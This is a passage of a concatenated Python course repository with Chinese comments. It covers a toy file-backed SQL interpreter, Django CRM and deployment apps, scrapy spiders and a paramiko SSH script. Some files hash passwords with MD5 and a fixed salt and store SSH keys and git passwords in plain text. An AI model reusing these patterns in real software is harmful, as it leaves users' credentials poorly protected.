age :param b: 22 :return: ''' match_list =[] for index,val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if int(val) > int(b): ##匹配上了 # print("match",val) onwer_list=[] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) #print("查询到的数据:",match_list) return match_list def lt(a,b): match_list = [] for index, val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if int(val) < int(b): ##匹配上了 # print("match",val) onwer_list = [] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) # print("查询到的数据:",match_list) return match_list def eq(a,b): match_list = [] for index, val in enumerate(dic[a]): ##a代表age , age[22,23,]并求出age的各个索引 if str(val.strip()) == str(b.strip()): ##匹配上了 onwer_list = [] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) # print("查询到的数据:",match_list) return match_list def op_like(a,b): match_list = [] for index, val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if b in val: ##匹配上了 # print("match",val) onwer_list = [] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) return match_list def check_where(right_yuju): tiaojian = { '>':gt, '<':lt, '=':eq, 'like':op_like, } for fu_hao,value in tiaojian.items(): #print(value) if fu_hao in right_yuju: a,b = right_yuju.split(fu_hao)#a和b接受到了age和22 a是key b是value matched_data = value(a.strip(),b.strip()) #print(matched_data) return matched_data else: print('where语法错误') ''' 解析where条件,判断大于,小于,等于和like :return: age>22 ''' def select(match_data,left_yuju): """ ##这个只是可以查看name和age的语句 :param match_data:[['2', 'Egon', '23', '13304320533', 'Tearcher\n'], ['3', 'nezha', '25', '1333235322', 'IT']] :param left_yuju: select name, age from userinfo :return: """ filter_cols_tmp = left_yuju.split('from')[0].split()[1:] #取出name,和age 例:[' name', ' age '] filter_cols = [i.strip().strip(",") for i in filter_cols_tmp] ##取出干净的name和age reformat_data_set = [] ##最终要打印的数据 if "*" in filter_cols: filter_cols = TITLE # 
[id,age,name,phone,job] for row in match_data: ##row是['3', 'nezha', '25', '1333235322', 'IT'] filtered_vals=[] ##['Egon', '23'] ['nezha', '25'] for col in filter_cols: ##col是name和age col_index = TITLE.index(col) ##name和age在title里面的索引1和2的位置 filtered_vals.append(row[col_index])#['3', 'nezha', '25', '1333235322', 'IT'][1] reformat_data_set.append(filtered_vals) print(tabulate(reformat_data_set, headers=TITLE, tablefmt="grid")) else: # filter_cols = TITLE # [id,age,name,phone,job] for row in match_data: ##row是['3', 'nezha', '25', '1333235322', 'IT'] filtered_vals = [] ##['Egon', '23'] ['nezha', '25'] for col in filter_cols: ##col是name和age col_index = TITLE.index(col) ##name和age在title里面的索引1和2的位置 filtered_vals.append(row[col_index]) # ['3', 'nezha', '25', '1333235322', 'IT'][1] reformat_data_set.append(filtered_vals) print(tabulate(reformat_data_set, headers=TITLE, tablefmt="grid")) def check_input(cmd): ## 检测输入的语句,并分割成两个语句(cmd是从用户输入的命令传过来的) """ :param cmd: select name, age where age>22 :return: """ syntax_list={ 'select':select, 'update':update, 'add':insert, 'delete':delete } if 'where' not in cmd and 'insert' not in cmd:## 这个是select * from userinfo 查询所有 zhuanhan() print(tabulate(dic, headers=TITLE, tablefmt="grid")) else: if cmd.split()[0] in ('select','update','delete',):#取出用户输入的第一个命令 left_yuju,right_yuju = cmd.split('where')#以where关键字分割语句 matched_data=check_where(right_yuju)#把where后面的语句传送给了check_where #print(matched_data) syntax_list[cmd.split()[0]](matched_data,left_yuju) # select update inst select() res = dic # update_file(res) elif cmd.split()[0] == 'insert': insert(cmd) else: print("语法错误") def insert(cmd): ''' :param cmd: 如:insert into userinfo id,name,age,phone,job values 5,jinxing,43,123456789,python :return: ''' filter_values = cmd.split('values')[-1].split(',') ##5,jinxing,43,123456789,python insert_file(filter_values) def update(match_data,left_yuju): ''' :param match_data: ['3', 'nezha', '25', '1333235322', 'IT'] ['4', 'hnf', '25', '1333235322', 'IT'] 
:param left_yuju: update name='bob' from userinfo :return: ''' print('影响了%s行' %(len(match_data))) filter_cols = left_yuju.split('from')[0].split()[1].split('=') #取出['name', 'bob'] for line in match_data: line_id = line[0] #取出id index = dic["id"].index(line_id)##取出id在上面字典里的索引 dic[filter_cols[0]][index] = filter_cols[1] #dic[filter_cols[0]] #获取出所有的名字,然后在获取名字对应的索引 update_file(dic) #return dic def delete(match_data,left_yuju): print('影响了%s行' %(len(match_data))) filter_cols = left_yuju.split('from')[0].split()[1].split('=') for del_line in match_data: line_id = del_line[0] # 取出id index = dic["id"].index(line_id) ##取出id在上面字典里的索引 dic.get("id").pop(index) dic.get("name").pop(index) dic.get("age").pop(index) dic.get("phone").pop(index) dic.get("job").pop(index) #print(dic) delete_file(dic) def insert_file(filter_values): ''' :param filter_values: [6, 'hnf', '23', '123456789', 'python'] :return: ''' global dic with open('userinfo', encoding='utf-8', mode='a+') as f1: n = 0 for i in filter_values: n += 1 if n == 1: i = int(dic.get('id')[-1]) + 1 f1.write(str(i)+',') elif 1< n < 5: f1.write(i.strip() + ',') else: f1.write(i + "\n") print("添加完毕") f1.seek(2) def delete_file(dic): ''' :param dic:从文件读取的数据{'id': ['1', '2', '3'], 'name': ['Alex', 'Egon', 'wusir'], 'age': ['23', '24', '35'], 'phone': ['13651054608', '13304320533', '1333235322'], 'job': ['IT\n', 'Tearcher\n', 'IT']} :return: ''' list_id = dic.get('id') list_name = dic.get('name') list_age = dic.get('age') list_phone = dic.get('phone') list_job = dic.get('job') list_data = zip(list_id, list_name, list_age, list_phone, list_job) for i in list_data: with open('userinfo.bak',encoding='utf-8',mode="a")as f1: str_i=",".join(i) #print(str_i) f1.write(str_i) os.remove('userinfo') os.rename("userinfo.bak","userinfo") def update_file(dic): list_id = dic.get('id') list_name = dic.get('name') list_age = dic.get('age') list_phone = dic.get('phone') list_job = dic.get('job') a = zip(list_id, list_name,list_age, list_phone, 
list_job) for i in a: with open("userinfo.bak", "a", encoding="utf-8") as f1: str_i = ",".join(i) #print(str_i) f1.write(str_i) os.remove("userinfo") os.rename('userinfo.bak','userinfo') ##输入语句 def yuju(): while True: global dic dic = zhuanhan() cmd = input("mysql>>:").strip()#cmd就是指用户开始输入的语句 if not cmd: continue check_input(cmd) ##传给检测你输入语句的函数 yuju()<file_sep>/day21/CMS/fault_reporting/admin.py from django.contrib import admin from fault_reporting import models # Register your models here. admin.site.register(models.UserInfo) admin.site.register(models.FaultReport) admin.site.register(models.Tag) admin.site.register(models.Comment) admin.site.register(models.UpDown) admin.site.register(models.Fault2Tag) admin.site.register(models.FaultDetail) admin.site.register(models.LOB)<file_sep>/auto_client/bin/run.py import sys import os import importlib # 可以导入字符串模块 os.environ['AUTO_CLIENT_SETTINGS'] = "conf.settings" # 设置环境变量 BASEDIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(BASEDIR) # from src.plugins import func # 函数版 # from src.plugins import PluginManager # 类版 from src import script if __name__ == '__main__': script.start() # obj = PluginManager() # 实例化一个对象 # server_dict = obj.exec_plugin() # 执行PluginManager类里面的一个exec_plugin方法 # print(server_dict) <file_sep>/deploy/test.py import os import sys import shutil from subprocess import check_output, check_call, CalledProcessError from zipfile import ZipFile CODE_BASE_PATH = r"C:\Users\Administrator\Desktop\deploy\codes" WEB_BASE_PATH = r"C:\Users\Administrator\Desktop\deploy\codes" def unpack_zipfile(proect_name, version, file_name): """ :param proect_name: :param version: :param file_name: :return: """ zip_file_path = os.path.join(CODE_BASE_PATH, proect_name, version, file_name) print(zip_file_path) web_file_path = os.path.join(CODE_BASE_PATH, proect_name, version, file_name.split('.')[0]) print(web_file_path) shutil.unpack_archive(zip_file_path, extract_dir=web_file_path, format='zip') 
def run(): project_name = sys.argv[1] version = sys.argv[2] file_name = sys.argv[3] unpack_zipfile(project_name, version, file_name) if __name__ == '__main__': run()<file_sep>/deploy/web/models.py from django.db import models class UserInfo(models.Model): """ 用户表 """ username = models.CharField(verbose_name='用户名', max_length=32) password = models.CharField(verbose_name='密码', max_length=64) server_name = models.CharField(verbose_name='SSH用户名', max_length=32) server_private_key = models.TextField(verbose_name='SSH私钥') git_name = models.CharField(verbose_name='git用户名', max_length=32) git_pwd = models.CharField(verbose_name='git密码', max_length=32) class Host(models.Model): """ 主机表 """ hostname = models.CharField(verbose_name='主机名', max_length=32) ssh_port = models.IntegerField(verbose_name='SSH端口') # Deploy = models.ForeignKey(verbose_name='发布任务', to='Deploy',null=True) def __str__(self): return self.hostname class Department(models.Model): """ 部门表 """ title = models.CharField(verbose_name='部门', max_length=32) def __str__(self): return self.title class Project(models.Model): """ 项目表 """ depart = models.ForeignKey(verbose_name='部门', to='Department') title = models.CharField(verbose_name='项目名称', max_length=32) git = models.CharField(verbose_name='仓库地址', max_length=128) private = models.BooleanField(verbose_name='是否私有', default=True) online_path = models.CharField(verbose_name='线上项目路径', max_length=128) hosts = models.ManyToManyField(verbose_name='关联主机', to='Host') class Deploy(models.Model): """ 部署任务表 例如: 1 0.11 2 1.10 1 0.12 """ project = models.ForeignKey(verbose_name='项目', to='Project') version = models.CharField(verbose_name='版本', max_length=32) uid = models.CharField(verbose_name='上线文件包名称', max_length=32, null=True, blank=True) status_choice = ( (1, '未获取'), (2, '待发布'), (3, '已发布'), (4, '已回滚'), ) status = models.IntegerField(verbose_name='状态', choices=status_choice, default=1) script = models.ForeignKey(verbose_name='script', to='Script', null=True, blank=True) class 
DeployRecord(models.Model): """ 服务器部署记录 """ deploy = models.ForeignKey(verbose_name='部署任务', to='Deploy') host = models.ForeignKey(verbose_name='主机', to='Host') host_version = models.CharField(verbose_name='版本', max_length=32,null=True) status_choice = ( (1, '发布中'), (2, '成功'), (3, '失败'), ) status = models.IntegerField(verbose_name='状态', choices=status_choice, default=1) deploy_time = models.DateTimeField(verbose_name='部署时间', auto_now_add=True) log = models.TextField(verbose_name='日志') class RollbackRecord(models.Model): """ 服务器部署记录 """ deploy = models.ForeignKey(verbose_name='部署任务', to='Deploy') host = models.ForeignKey(verbose_name='主机', to='Host') host_version = models.CharField(verbose_name='版本', max_length=32,null=True) status_choice = ( (1, '发布中'), (2, '成功'), (3, '失败'), ) status = models.IntegerField(verbose_name='状态', choices=status_choice, default=1) deploy_time = models.DateTimeField(verbose_name='部署时间', auto_now_add=True) rollback_log = models.TextField(verbose_name='日志') class Script(models.Model): """ script """ title = models.CharField(verbose_name='标题', max_length=128) interpreter_choices = { ('py', 'python3'), ('sh', 'bash') } interpreter = models.CharField(verbose_name='解释器', choices=interpreter_choices, default='py', max_length=16) code = models.TextField(verbose_name='上传脚本') rollback_code = models.TextField(verbose_name='回滚脚本',null=True) def __str__(self): return self.title <file_sep>/deploy/web/views/host.py from django.shortcuts import render,HttpResponse,redirect from web.forms.host import HostModelForm from web import models from web.utils.pager import Pagination from web.utils.urls import memory_reverse def host_list(request): """ 部门列表 :param request: :return: """ # 要查看的页码 page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.Host.objects.all().count() # 数据库中获取即可 pager = Pagination(page,total_count,request.path_info) depart_queryset = models.Host.objects.all()[pager.start :pager.end] return 
render(request,'host_list.html',{'depart_queryset':depart_queryset,'pager':pager}) def host_add(request): """ 添加部门 :param request: :return: """ if request.method == 'GET': form = HostModelForm() return render(request, 'form.html', {'form':form}) form = HostModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.save() return redirect(memory_reverse(request,'host_list')) return render(request, 'form.html', {'form': form}) def host_edit(request,nid): """ 编辑部门 :param request: :param nid: 当前要编辑的部门ID :return: """ obj = models.Host.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = HostModelForm(instance=obj) return render(request,'form.html',{'form':form}) # 带默认值 form = HostModelForm(data=request.POST,instance=obj) if form.is_valid(): form.save() return redirect(memory_reverse(request,'host_list')) return render(request, 'form.html', {'form': form}) def host_del(request,nid): """ 删除部门 :param request: :param nid: :return: """ origin = memory_reverse(request,'host_list') if request.method == 'GET': return render(request, 'delete.html', {'cancel': origin}) models.Host.objects.filter(id=nid).delete() return redirect(origin)<file_sep>/day26/scrapy框架/first/first/spiders/qiushi.py # -*- coding: utf-8 -*- import scrapy class QiushiSpider(scrapy.Spider): name = 'qiushi' # allowed_domains = ['www.aa.com'] start_urls = ['https://www.qiushibaike.com/'] def parse(self, response): # xpath为response中的方法,可以将xpath表达式直接作用于该函数中 odiv = response.xpath('//div[@id="content-left"]/div') content_list = [] # 用于存储解析到的数据 for div in odiv: # xpath函数返回的为列表,列表中存放的数据为Selector类型的数据。我们解析到的内容被封装在了Selector对象中,需要调用extract()函数将解析的内容从Selecor中取出。 author = div.xpath('.//div[@class="author clearfix"]/a/h2/text()')[0].extract() content = div.xpath('.//div[@class="content"]/span/text()').extract() print(content) # 将解析到的内容封装到字典中 dic = { '作者': author, '内容': content } # 将数据存储到content_list这个列表中 content_list.append(dic) return content_list # 
运行方法在cmd里面,进去你所建的那个项目, # 执行输出指定格式进行存储:将爬取到的数据写入不同格式的文件中进行存储 # scrapy crawl qiubai -o qiubai.json # scrapy crawl qiubai -o qiubai.xml # scrapy crawl qiubai -o qiubai.csv # #持久化存储方式: # #1.基于终端指令:必须保证parse方法有一个可迭代类型对象的返回 ,content_list就是一个科迭代的 # #2.基于管道<file_sep>/day26/scrapy框架/daili/daili/spiders/dailiip.py # -*- coding: utf-8 -*- # 开启代理的流程: # 1 在setting里面开启下载中间件 ''' DOWNLOADER_MIDDLEWARES = { 'daili.middlewares.DailiDownloaderMiddleware': 543, } ''' # 2 在middlewares里面写上代理 ''' def process_request(self, request, spider): # request参数表示的就是拦截到的请求对象 request.meta['proxy'] = "https://172.16.17.32:1080" ''' import scrapy class DailiipSpider(scrapy.Spider): name = 'dailiip' # allowed_domains = ['www.xx.com'] start_urls = ['https://www.baidu.com/s?wd=ip'] def parse(self, response): page_text = response.text with open('./daili.html', 'w', encoding='utf-8') as fp: fp.write(page_text) <file_sep>/day27/s21crm/crm/views/logout.py from django.shortcuts import render, redirect from django.urls import reverse from crm import models from crm.pwd.md5 import md5 from rbac.service.permission import init_permission from functools import wraps # session 登录装饰器 def login_check(func): @wraps(func) def inner(request, *args, **kwargs): next_url = request.path_info if request.session.get('user'): return func(request, *args, **kwargs) else: return redirect("/login/?next_url={}".format(next_url)) return inner # 注销页面 @login_check def logout(request): # 删除所有当前请求相关的session request.session.delete() return redirect("/login/") <file_sep>/day25/爬取豆瓣网post请求.py # 必须先登录,然后去浏览器里面--network---找到登录页面--login--headers,查看参数在formdata里面 # Doubai123 import requests url = 'https://accounts.douban.com/login' # post请求携带参数设置 data = { 'source': 'movie', 'redir': 'https://movie.douban.com/', # 登录成功之后跳转的页面 'form_email': '<EMAIL>', 'form_password': '<PASSWORD>', 'login': '登录', } # 自定义hearders headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 
Safari/537.36' } # 请求 response = requests.post(url=url, data=data,headers=headers) # 获取响应数据 page_text = response.text # 持久化存储 with open('./doubai.html', 'w', encoding='utf-8') as f: f.write(page_text) <file_sep>/cmdb/auto_client - 7 - 资产信息入库/相关脚本/2.线程池.py #!/usr/bin/python # -*- coding:utf-8 -*- import time from concurrent.futures import ThreadPoolExecutor def task(host): """ 采集资产 :return: """ time.sleep(2) print(host) # 创建了一个线程池,线程池中最多放20个线程(20个我去采集资产) pool = ThreadPoolExecutor(20) for i in range(1,101): hostname = "c%s.com" %(i,) # 去线程池中申请一个线程去执行task函数 pool.submit(task,hostname)<file_sep>/day4/5.内置函数.py # 自定义函数 # 内置函数 # print # len # max min # dir # def func(): # a = 1 # b = 2 # print(locals()) # print(globals()) # 全局命名空间中的名字 # print(locals()) # 本地的命名空间 # print(globals()) # 全局的命名空间 # func() # inp = input('>>>') # 99乘法表 # for i in range(1,10): # for j in range(1,i+1): # print('%s * %s = %2s'%(i,j,i*j),end=' ') # print() # print(1,2,3,4,5,sep=';',end=' ') # print(1,2,3,4,5,sep=';',end='') # import time # for i in range(0,101,2): #0,2,4,6,8 # time.sleep(0.1) # char_num = i//2 #打印多少个'*' 4 # if i == 100: # per_str = '\r%s%% : %s\n' % (i, '*' * char_num) # else: # per_str = '\r%s%% : %s'%(i,'*'*char_num) # print(per_str,end='',flush=True) # 0.01 # print() 写文件 # python 能直接操作文件 —————— 需要发起系统调用 才能操作文件 # print(hash('1291748917')) # print(hash('1291748917')) #对可hash的数据类型进行hash之后会得到一个数字 # 在一次程序的执行过程中 对相同的可哈希变量 哈希之后的结果永远相同的 # 在一次程序的执行过程中 对不相同的可哈希变量 哈希之后的结果几乎总是不相同的 # hash 字典底层的存储 和set 集合的去重机制 都相关 # id() # callable 可调用 # def func():pass # a = 1 # print(callable(func)) # print(callable(a)) # print(dir('1')) # 查看一个变量所拥有的所有名字 # print(bin(10)) # print(oct(10)) # print(hex(10)) # 0123456789abcdef # print(abs(4)) # print(abs(-4)) # print(divmod(10,2)) # 商余函数 # print(divmod(7,3)) # 商余函数 # print(divmod(9,7)) # 商余函数 # 返回一个元组 # print(round(3.1415926,4)) # 默认取整,小数精确 会四舍五入 # print(pow(2,3,5)) # (2**3)%5 # print(pow(3,2,2)) # print(sum([1,2,3,4,5])) # print(sum([1,2,3,4,5],start=0)) # 
print(sum([1,2,3,4,5],start=20)) # print(sum(range(1,6))) # print(min([1,2,3,4,5])) # print(min(1,2,3,4)) # print(min(1,-2,3,-4)) # print(min(1,-2,3,-4,key=abs)) # def func(num): # return num%2 # print(min(-2,3,-4,key=func)) # ret = [1,2,3,4,5] # ret.reverse() # print(ret) # ret1 = reversed(ret) # ret2 = reversed((1,2,3,4,5)) # print(ret) # print(list(ret1)) # print(list(ret2)) # print(format('test', '<20')) # print(format('test', '>20')) # print(format('test', '^20')) # print(ord('a')) # 小写的a-z 97+26 A-Z 65+26 # print(chr(97)) # print(1) # print('1') # print(repr(1)) # print(repr('1')) # l = ['苹果','香蕉'] # # ret = enumerate(l,1) # 枚举 接收两个参数:一个容器类型,一个序号起始值 返回值:可迭代的 # # print(ret) # for num,item in enumerate(l,1): # print(num,item) # print(all([1,2,3,4,5])) # print(all([0,1,2,3,4,5])) # print(all(['a',1,2,3,4,5])) # print(all(['',1,2,3,4,5])) # print(any([0,None,False])) # ret = zip([1,2,3,4,5],('a','b','c','d'),(4,5)) #拉链方法 # print(ret) # for i in ret: # print(i) # lst = [1, 4, 6, 7, 9, 12, 17] # def func(num): # if num % 2 == 0:return True # filter(func,lst) # for i in filter(func,lst): # print(i) # g = (i for i in lst if i%2 == 0) # l = ['test', None, '', 'str', ' ', 'END'] # def func(item): # if item and item.strip():return True # for i in filter(func,l): # print(i) # [i**2 for i in range(10)] # def func(num): # return num ** 2 # for i in map(func,range(10)):print(i) # 排序功能 # l = [1,-4,-2,3,-5,6,5] # l.sort(key=abs) # print(l) # l = [1,-4,-2,3,-5,6,5] # new_l = sorted(l,key=abs,reverse=True) # print(new_l) # l = [[1,2],[3,4,5,6],(7,),'123'] # # print(sorted(l,key=len)) # eval() # eval('print(123)') # exec('print(123)') # print(eval('1+2-3*20/(2+3)')) # print(exec('1+2-3*20/(2+3)')) # 内置函数 # 标红的如果不会 # 标黄的 是能够节省你的代码 面试会用 # min max sorted filter map 面试明星知识点 # 你经常不见 且没被点名说重点的 就不用特别了解了 <file_sep>/day27/s21crm/crm/views/classes.py from django.shortcuts import render, redirect from crm import models from crm.forms.classes import ClassesModelForm from django.urls import 
reverse def classes_list(request): """ 部门列表 :param request: :return: """ queryset = models.ClassList.objects.all() return render(request, 'classes_list.html', {'queryset': queryset}) def classes_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = ClassesModelForm() return render(request, 'classes_add.html', {'form': form}) form = ClassesModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('classes_list') else: return render(request, 'classes_add.html', {'form': form}) def classes_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.ClassList.objects.filter(id=nid).first() if request.method == "GET": form = ClassesModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'classes_edit.html', {"form": form}) form = ClassesModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('classes_list') else: return render(request, 'classes_edit.html', {"form": form}) def classes_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.ClassList.objects.filter(id=nid).delete() return redirect('classes_list') <file_sep>/day27/s21crm/crm/pwd/md5.py import hashlib def md5(data): """ MD5加密 :param data: 要加密的字符串 :return: 加密后的字符串 """ hash = hashlib.md5(b'us9sdkfsdfj') hash.update(data.encode('utf-8')) return hash.hexdigest() <file_sep>/deploy/script/ssh.py import paramiko from io import StringIO key_str = """-----<KEY> tud<KEY>""" file_obj = StringIO(key_str) print(file_obj) private_key = paramiko.RSAKey(file_obj) transport = paramiko.Transport(('192.168.7.32', 22)) transport.connect(username='yx', pkey=private_key) ssh = paramiko.SSHClient() ssh._transport = transport stdin, stdout, stderr = ssh.exec_command('df') result = stdout.read() transport.close() print(result.decode()) <file_sep>/day7/三个装饰器函数.py ''' # property的用法 #第一种写法: from math import pi class Circle: def __init__(self,r): self.r=r def mj(self): 
return pi*self.r**2 def zc(self): return 2*pi*self.r c1=Circle(3) print(c1.mj()) #第二种写法:用property 将一个函数伪装成为属性 class Circle: def __init__(self,r): self.r=r @property def mj(self): return pi*self.r**2 @property def zc(self): return 2*pi*self.r c1=Circle(3) print(c1.mj) # property 跟__私有属性的结合 如:苹果打折的问题 class Goods(): def __init__(self,price,discount): self.__price=price self.discount=discount @property def price(self): #现有的价格 return self.__price * self.discount @price.setter #设置一个新的属性即新的价格 def price(self,newprice): self.__price=newprice @price.deleter #删除一个价格 def price(self): del self.__price apple=Goods(8,0.7) print(apple.price) apple.price=10 print(apple.price) print(apple.__dict__) del apple.price print(apple.__dict__) ''' # classmethod class Person: Country='中国人' @classmethod #把func变成了一个类方法 def func(cls): #cls指向了类的内存空间 print('当前角色的国家是%s' %cls.Country) alex=Person() alex.func() Person.func() #如果某一个类中的方法 并没有用到这个类的实例中的具体属性 # 只是用到了类中的静态变量 就使用类方法<file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/script.py #!/usr/bin/python # -*- coding:utf-8 -*- import importlib from config import settings from lib.module_string import import_string def run(): """ 采集资产的入口 :return: """ # 'src.engine.agent.AgentHandler' engine_path = settings.ENGINE_HANDLERS.get(settings.ENGINE) cls = import_string(engine_path) obj = cls() obj.handler()<file_sep>/day15/作业/bin/start.py import sys import os sys.path.append(os.path.dirname(os.path.dirname(__file__))) from core import main if __name__ == '__main__': main.choice() <file_sep>/day5/作业1.py import re res = re.compile(r'\([^()]+\)') # 匹配最小单位的括号 input_filter = re.compile('[a-zA-Z]') def check_rede_and_except(s): ''' 检测表达式里面是否有乘除法 :param s: 传进来的计算表达式 :return: 返回一个没有乘除号的表达式 ''' l = re.findall('([\d\.]+|/|-|\+|\*)',s) # ['100.5', '+', '40', '*', '5', '/', '2', '-', '3', '*', '2', '*', '2', '/', '4', '+', '9'] while 1: if '*' in l and '/' not in l: ret = jisuan_rede_and_except(l, '*') elif '/' in l and '*' not in l: ret = jisuan_rede_and_except(l, '/') elif 
'/' in l and '*' in l: a = l.index('*') b = l.index('/') if a < b: ret = jisuan_rede_and_except(l, '*') else: ret = jisuan_rede_and_except(l, '/') else: break return jisuan_jia_and_jian(l) def jisuan_rede_and_except(l, x): ''' 计算乘除 :param l: 是带有乘除号的表达式 :param x: 除号或者乘号 :return: 返回一个没有乘除号的表达式 ''' a = l.index(x) if x == '*' and l[a + 1] != '-': k = float(l[a - 1]) * float(l[a + 1]) elif x == '/' and l[a + 1] != '-': k = float(l[a - 1]) / float(l[a + 1]) elif x == '*' and l[a + 1] == '-': k = -(float(l[a - 1]) * float(l[a + 2])) elif x == '/' and l[a + 1] == '-': k = -(float(l([a - 1])) / float(l[a + 2])) del l[a - 1], l[a - 1], l[a - 1] l.insert(a - 1, str(k)) return l #['100.5', '+', '100.0', '-', '3.0', '+', '9'] 上面的计算加减的函数接收到l def jisuan_jia_and_jian(l): ''' 计算加减 :param l: 是一个只含有加减号的表达式 :return: sum最终的计算结果 ''' sum = 0 while l: #l=['100.5', '+', '100.0', '-', '3.0', '+', '9'] i=1,3,5 if l[0] == '-': ##['-','1','+','2'] l[0] = l[0] + l[1] ##l[0]=-1 del l[1] # 把1删除 sum += float(l[0]) for i in range(1, len(l), 2): #取出l列表里面的加减符号 if l[i] == '+' and l[i + 1] != '-': sum += float(l[i + 1]) elif l[i] == '+' and l[i + 1] == '-': sum -= float(l[i + 2]) elif l[i] == '-' and l[i + 1] == '-': sum += float(l[i + 2]) elif l[i] == '-' and l[i + 1] != '-': sum -= float(l[i + 1]) break return sum def brackets(expression): ''' 检查是否有括号 :param expression: 用户输入的表达式 :return: 返回一个没有括号的表达式 ''' if not res.search(expression): # 匹配最里面的括号,如果没有的话,去检测是否有乘除号 return check_rede_and_except(expression) k = res.search(expression).group() # 取出最小括号里面的值 expression = expression.replace(k, str(check_rede_and_except(k[1:len(k) - 1]))) # 把刚才计算的式子替换成计算的结果eg:2*3 替换成6 ,直到没有括号为止 ''' expression结果: 1 - 2 * ( (60-30 +-5.0 * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) ) 1 - 2 * ( (60-30 +-5.0 * 173545.88095238098) - (-4*3)/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - (-4*3)/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - -12.0/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - -12.0/ 10.0 ) 1 - 2 * 
-867698.2047619049 ''' return brackets(expression) while True: # print("退出请按q\Q") s = input('请输入你想要计算的数字:') a = s.replace(' ', '') if input_filter.search(a) or a.count('(') != a.count(')'): print("你输入的表达式有误,请重新输入") continue if a=='': continue print(brackets(a)) <file_sep>/day17/s21/app01/migrations/0007_auto_20180815_1446.py # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-08-15 06:46 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app01', '0006_auto_20180814_1649'), ] operations = [ migrations.AlterField( model_name='host', name='hostname', field=models.CharField(max_length=32), ), ] <file_sep>/day5/递归.py ##算年龄 # def age(n): # if n == 3: # return 40 # else: # return age(n+1)+2 # print(age(3)) ##递归二分查找算法 l = [2,3,5,10,15,16,18,22,26,30,32,35,41,42,43,55,56,66,67,69,72,76,82,83,88] # def cal(l,num,start,end): # if start<end: # mid = (end-start)//2 +start ##mid代表索引 # print(start,end) # # if l[mid]< num: # cal(l,num,mid+1,end) # elif l[mid]> num: # cal(l,num,start,mid-1) # else: # print('找到了',mid,l[mid]) # else: # print('没找到') # cal(l,58,0,len(l)-1) def cal(l,num,start,end): ''' :param l: 是列表 :param num: 要找的数字 :param start: 开始索引 :param end: 结束索引 :return: ''' if start<end: mid = (end-start)//2 +start ##mid代表索引 # print(start,end) if l[mid]< num: return cal(l,num,mid+1,end) elif l[mid]> num: return cal(l,num,start,mid-1) else: return mid,l[mid] else: return '没找到' print(cal(l,53,0,len(l)-1)) #l = [2,3,5,10,15,16,18,22,26,30,32,35,41,42,43,55,56,66,67,69,72,76,82,83,88] # def cal(l,num,start=0,end=None): # # if end is None:end = len(l)-1 # end = len(l)-1 if end is None else end # if start <= end: # mid = (end - start)//2 + start # if l[mid] > num : # return cal(l, num, start, mid-1) # elif l[mid] < num: # 13 24 # return cal(l,num,mid+1,end) # else: # return mid # else: # return None # l = [2,3,5,10,15,16,18,22,26,30,32,35,41,42,43,55,56,66,67,69,72,76,82,83,88] # 
print(cal(l,56)) # print(len(l))<file_sep>/auto_server/web/views.py from django.shortcuts import render from repository import models from django.http import JsonResponse def server(request): return render(request, 'server.html') # Create your views here. def server_json(request): table_config = [ { 'q': 'hostname', 'title': '主机名', }, { 'q': 'sn', 'title': '序列号', }, { 'q': 'os_platform', 'title': '系统', }, ] values = [] for item in table_config: values.append(item['q']) server_list = models.Server.objects.values(*values) print(server_list) response = { 'data_list': list(server_list), 'table_config': table_config } return JsonResponse(response) <file_sep>/day9/socket并发聊天/server.py # from socket import * # from multiprocessing import Process # server=socket() # server.setsockopt(SOL_SOCKET,SO_REUSEADDR,1) # server.bind(('127.0.0.1',8080)) # server.listen() # def talk(conn,client_addr): # while True: # try: # msg=conn.recv(1024) # if not msg:break # conn.send(msg.upper()) # except Exception: # break # if __name__ == '__main__': # while True: # conn,client_addr=server.accept() # p=Process(target=talk,args=(conn,client_addr)) # p.start() from socket import * from multiprocessing import Pool import os server=socket() server.setsockopt(SOL_SOCKET,SO_REUSEADDR,1) #地址可以重用 server.bind(('127.0.0.1',8080)) server.listen(5) def talk(conn): print('进程pid: %s' %os.getpid()) while True: try: msg=conn.recv(1024) if not msg:break conn.send(msg.upper()) except Exception: break if __name__ == '__main__': p=Pool(4) while True: conn,*_=server.accept() p.apply_async(talk,args=(conn,))<file_sep>/day18/s21/app01/my_md5.py import hashlib #动态加盐 def md5(user,pwd): md5obj=hashlib.md5(user.encode('utf-8')) md5obj.update(pwd.encode('utf-8'))# 使用md5算法的对象来操作字符串里面必须是bytes类型 return md5obj.hexdigest() <file_sep>/day6/8.多态.py # 在python中处处都是多态 # 多态 # java # class Person():pass # # alex = Person() # print(type(alex)) # Person # print(type('123')) # print(type(123)) # def func(Dog person): # pass # # 
